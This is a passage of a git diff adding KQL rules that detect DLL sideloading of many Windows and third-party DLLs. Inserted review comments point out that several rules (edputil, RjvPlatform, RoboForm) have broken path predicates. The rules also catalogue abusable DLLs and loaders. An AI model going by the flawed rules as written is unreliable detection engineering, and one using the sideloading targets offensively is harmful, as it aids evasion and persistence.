+// Title: Potential DLL Sideloading Of MsCorSvc.DLL
+// Author: Wietze Beukema
+// Date: 2024-07-11
+// Level: medium
+// Description: Detects potential DLL sideloading of "mscorsvc.dll".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Legitimate applications loading their own versions of the DLL mentioned in this rule.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\mscorsvc.dll" and (not((FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_using_coregen_exe.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_using_coregen_exe.kql
new file mode 100644
index 00000000..fa36580e
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_using_coregen_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Using Coregen.exe
+// Author: frack113
+// Date: 2022-12-31
+// Level: medium
+// Description: Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.t1055
+
+DeviceImageLoadEvents
+| where InitiatingProcessFolderPath endswith "\\coregen.exe" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Program Files\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_via_classicexplorer32_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_classicexplorer32_dll.kql
new file mode 100644
index 00000000..44d43c37
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_via_classicexplorer32_dll.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Via ClassicExplorer32.dll
+// Author: frack113
+// Date: 2022-12-13
+// Level: medium
+// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_via_comctl32_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_comctl32_dll.kql
new file mode 100644
index 00000000..a6545a1b
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_via_comctl32_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Via comctl32.dll
+// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
+// Date: 2022-12-16
+// Level: high
+// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_via_jsschhlp.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_jsschhlp.kql
new file mode 100644
index 00000000..da26d015
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_via_jsschhlp.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Via JsSchHlp
+// Author: frack113
+// Date: 2022-12-14
+// Level: medium
+// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_via_vmware_xfer.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_vmware_xfer.kql
new file mode 100644
index 00000000..f0e46043
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_via_vmware_xfer.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Via VMware Xfer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\glib-2.0.dll" and InitiatingProcessFolderPath endswith "\\VMwareXferlogs.exe") and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_eacore_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_eacore_dll_sideloading.kql
new file mode 100644
index 00000000..f6502254
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_eacore_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential EACore.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: high
+// Description: Detects potential DLL sideloading of "EACore.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_edputil_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_edputil_dll_sideloading.kql
new file mode 100644
index 00000000..4b0af827
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_edputil_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Edputil.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: high
+// Description: Detects potential DLL sideloading of "edputil.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_goopdate_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_goopdate_dll_sideloading.kql
new file mode 100644
index 00000000..02fc4958
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_goopdate_dll_sideloading.kql
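Review bot: The WinSxS exclusion in the edputil `| where` clause can never match: the literal is `"C\\Windows\\WinSxS\\"`, with no colon after the drive letter, so a load of edputil.dll from the legitimate side-by-side store is not filtered out and the rule fires on it, which contradicts the "Unlikely" false-positive note. The other two entries on the same line use `"C:\\Windows\\..."`, so the intended value is `FolderPath startswith "C:\\Windows\\WinSxS\\"`. If this string is carried over verbatim from the upstream Sigma rule, the correction belongs there or in a post-conversion step, since a fix applied only to this generated file would presumably be overwritten on the next conversion run.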
@@ -0,0 +1,13 @@
+// Title: Potential Goopdate.DLL Sideloading
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.
+// - Other third party chromium browsers located in AppData
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not((((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox")) or ((FolderPath contains "\\AppData\\Local\\Temp\\GUM" or FolderPath contains ":\\Windows\\SystemTemp\\GUM") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" or InitiatingProcessFolderPath contains ":\\Windows\\SystemTemp\\GUM") and InitiatingProcessFolderPath endswith ".tmp\\GoogleUpdate.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_iviewers_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_iviewers_dll_sideloading.kql
new file mode 100644
index 00000000..e443ad8c
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_iviewers_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Iviewers.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-21
+// Level: high
+// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_libvlc_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_libvlc_dll_sideloading.kql
new file mode 100644
index 00000000..4ba1d45e
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_libvlc_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Libvlc.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives are expected if VLC is installed in non-default locations
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_mfdetours_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_mfdetours_dll_sideloading.kql
new file mode 100644
index 00000000..c6a92fed
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_mfdetours_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mfdetours.DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_mpclient_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_mpclient_dll_sideloading.kql
new file mode 100644
index 00000000..37e3c542
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_mpclient_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mpclient.DLL Sideloading
+// Author: Bhabesh Raj
+// Date: 2022-08-02
+// Level: high
+// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\mpclient.dll" and (InitiatingProcessFolderPath endswith "\\MpCmdRun.exe" or InitiatingProcessFolderPath endswith "\\NisSrv.exe")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_rcdll_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_rcdll_dll_sideloading.kql
new file mode 100644
index 00000000..a3f1ecd5
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_rcdll_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Rcdll.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-13
+// Level: high
+// Description: Detects potential DLL sideloading of rcdll.dll
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_default_location.kql b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_default_location.kql
new file mode 100644
index 00000000..96cf94db
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_default_location.kql
@@ -0,0 +1,10 @@
+// Title: Potential RjvPlatform.DLL Sideloading From Default Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: medium
+// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_non_default_location.kql b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_non_default_location.kql
new file mode 100644
index 00000000..e8ce9673
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_non_default_location.kql
@@ -0,0 +1,12 @@
+// Title: Potential RjvPlatform.DLL Sideloading From Non-Default Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: high
+// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_roboform_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_roboform_dll_sideloading.kql
new file mode 100644
index 00000000..f0febe69
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_roboform_dll_sideloading.kql
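Review bot: `InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe"` in the where clause is an exact (case-insensitive) equality against a bare file-name suffix, so it cannot match a full process path and the rule will never fire; the exclusion on the same line (`InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"`) shows the column is expected to hold a full path. The source rule presumably uses a suffix modifier here, so the intended predicate is `InitiatingProcessFolderPath endswith "\\SystemResetPlatform.exe"`. Since these files are converter output, it is worth checking whether the converter emits `=~` for other suffix-style values as well rather than patching this file alone.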
@@ -0,0 +1,12 @@
+// Title: Potential RoboForm.DLL Sideloading
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-14
+// Level: medium
+// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_shelldispatch_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_shelldispatch_dll_sideloading.kql
new file mode 100644
index 00000000..ec25ca4a
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_shelldispatch_dll_sideloading.kql
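Review bot: Both `startswith` values in the RoboForm exclusion begin with a space (`" C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\"` and `" C:\\Program Files\\Siber Systems\\AI RoboForm\\"`), so the exclusion can never match a real path and every load of roboform.dll by the legitimate robotaskbaricon.exe from the default install directory will alert. Dropping the leading space from both strings restores the intended filter. If the space originates in the source rule, fixing or trimming it at conversion time would keep the generated file correct on the next run.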
@@ -0,0 +1,12 @@
+// Title: Potential ShellDispatch.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-20
+// Level: medium
+// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Some installers may trigger some false positives
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_smadhook_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_smadhook_dll_sideloading.kql
new file mode 100644
index 00000000..6272a136
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_smadhook_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential SmadHook.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-01
+// Level: high
+// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_solidpdfcreator_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_solidpdfcreator_dll_sideloading.kql
new file mode 100644
index 00000000..5897c31d
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_solidpdfcreator_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential SolidPDFCreator.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-07
+// Level: medium
+// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql b/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql
new file mode 100644
index 00000000..515402aa
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql
@@ -0,0 +1,12 @@ +// Title: Potential System DLL Sideloading From Non System Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-14 +// Level: high +// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLLs mentioned in this rule + +DeviceImageLoadEvents +| where (FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certcli.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cfgmgr32.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath 
endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\d3dx9_43.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith 
"\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith 
"\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith 